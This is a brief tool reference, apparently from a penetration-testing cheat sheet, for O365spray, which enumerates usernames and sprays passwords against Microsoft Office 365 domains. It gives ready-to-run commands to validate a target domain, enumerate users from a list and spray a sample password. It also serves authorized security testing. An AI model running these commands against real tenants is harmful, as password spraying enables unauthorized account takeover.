O365spray
O365spray is a username enumeration and password spraying tool aimed at Microsoft Office 365 (O365) developed by ZDH. This tool reimplements a collection of enumeration and spray techniques researched.
Installation
Repo: https://github.com/0xZDH/o365spray
Basic usage
User enumeration:
# First validate if our target domain is using Office 365.
python3 o365spray.py --validate --domain msexample.com
# Attempt to identify usernames.
python3 o365spray.py --enum -U users.txt --domain msexample.com
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msexample.com